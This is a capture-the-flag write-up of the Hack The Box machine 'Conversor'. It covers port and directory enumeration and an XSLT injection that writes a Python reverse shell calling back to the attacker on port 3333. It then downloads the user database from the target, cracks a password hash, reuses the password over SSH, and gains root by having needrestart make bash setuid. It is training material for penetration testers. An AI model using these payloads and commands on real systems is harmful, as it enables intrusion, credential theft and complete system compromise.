HTB – Conversor | lameiro0x

Machine: Conversor
Platform: Hack The Box
Difficulty: Easy
OS: Linux
Focus: Web exploitation, XML/XSLT injection, credential reuse, privilege escalation via misconfigured sudo binary

Enumeration

We begin with a basic full TCP port scan using nmap:

nmap -sT -p- --min-rate 2000 10.10.11.92

This scan performs a full TCP connect scan against all ports, increasing the minimum packet rate to speed up discovery.

From the output, we observe the following open ports:

PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
9090/tcp open  zeus-admin

Based on the presence of ports 80 and 9090, it is reasonable to assume that the target is hosting a web application.
We navigate to the target IP address (10.10.11.92) using a browser and observe that it resolves to the domain:

conversor.htb

Since this domain is not publicly resolvable, we add it to our local hosts file so that our system can resolve it correctly.

We append the following entry to /etc/hosts:

10.10.11.92   conversor.htb

Directory Enumeration

With the domain properly resolving, we proceed to enumerate directories and endpoints exposed by the web application using DirBuster:

dirbuster -u http://conversor.htb

For this scan, the wordlist used was:

/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

This wordlist was selected directly from the DirBuster GUI.

The enumeration returns the following results:

Dir found: / - 302
Dir found: /icons/ - 403
File found: /login - 200
File found: /register - 200
Dir found: /icons/small/ - 403
Dir found: /javascript/ - 403

At this point, nothing immediately sensitive is exposed.
We therefore register a standard user account and log into the application.

Once authenticated, we reach the main functionality of the site, which allows users to upload .xml files for conversion.

This upload functionality represents a potential attack surface, as improperly handled XML processing can lead to code execution or file write vulnerabilities.

Initial Foothold

To prepare for exploitation, we first set up a listener on our attacking machine:

nc -lvnp 3333

Next, we craft a malicious XSLT payload. This payload abuses XSLT extensions to write a Python reverse shell directly onto the target filesystem.

The malicious XSL file is the following:

<?xml version="1.0" encoding="UTF-8"?>
<xsl:stylesheet
  xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
  xmlns:exploit="http://exslt.org/common"
  extension-element-prefixes="exploit"
  version="1.0">

  <xsl:template match="/">
    <exploit:document href="/var/www/conversor.htb/scripts/shell.py" method="text">
import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("UR_IP",3333))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
subprocess.call(["/bin/bash","-i"])
    </exploit:document>
  </xsl:template>
</xsl:stylesheet>

Additionally, we create a simple dummy XML file to satisfy the upload requirements of the application:

<?xml version="1.0"?>
<root>test</root>

Both files are uploaded through the web interface.
Once processed by the backend, the malicious payload is executed, and we receive a reverse Bash shell on our netcat listener.

Post-Exploitation: User Flag

With shell access established, we navigate to the application instance directory:

conversor.htb/instance

This directory is commonly interesting, as it often contains configuration files or databases.

Inside, we discover a database file. To exfiltrate it, we start a temporary HTTP server on the target machine:

python3 -m http.server 8080

From our attacking machine, we download the database:

wget http://10.10.11.92:8080/users.db

Inspecting the database locally, we observe the following:

sqlite> .tables
files  users
sqlite> select * from users;
1|fismathack|5b5c3ac3a1c897c94caad48e6c71fdec

The database contains hashed credentials for the user fismathack.

We attempt to crack the hash using Hashcat with the RockYou wordlist:

hashcat -m 0 -a 0 hash.txt /usr/share/wordlists/rockyou.txt

Once the password is recovered, we use it to authenticate via SSH:

ssh fismathack@10.10.11.92

After logging in successfully, we locate the user flag at:

user.txt

Privilege Escalation — Root Flag

Privilege escalation on this machine is more complex and requires abusing a trusted binary.

From the SSH session, we execute the following commands:

echo 'system("chmod +s /bin/bash");' > pwn.sh

sudo /usr/sbin/needrestart -c pwn.sh

Explanation of what is happening:

The first command creates a file containing a dangerous system instruction.
The second command forces a binary executed as root (needrestart) to load and execute that file.
Because the binary blindly trusts the file content, arbitrary command execution occurs as root.

This effectively results in a binary abuse leading to root code execution.

Afterward, we spawn a Bash shell while preserving elevated privileges:

/bin/bash -p

At this point, we have full root access to the system.

We navigate to:

/root/root.txt

Where the root flag is located.

Reference & Study Material

This write-up is based on practical exercises and methodology learned during my Hack The Box – Pentesting Path training.

The exploitation techniques, enumeration flow, and privilege escalation logic are supported by my extended study notes, diagrams, and command references available here: (and also this write-up)

🔗 https://github.com/lameiro0x/pentesting-path-htb

Enumeration#

Directory Enumeration#

Initial Foothold#

Post-Exploitation: User Flag#

Privilege Escalation — Root Flag#

Reference & Study Material#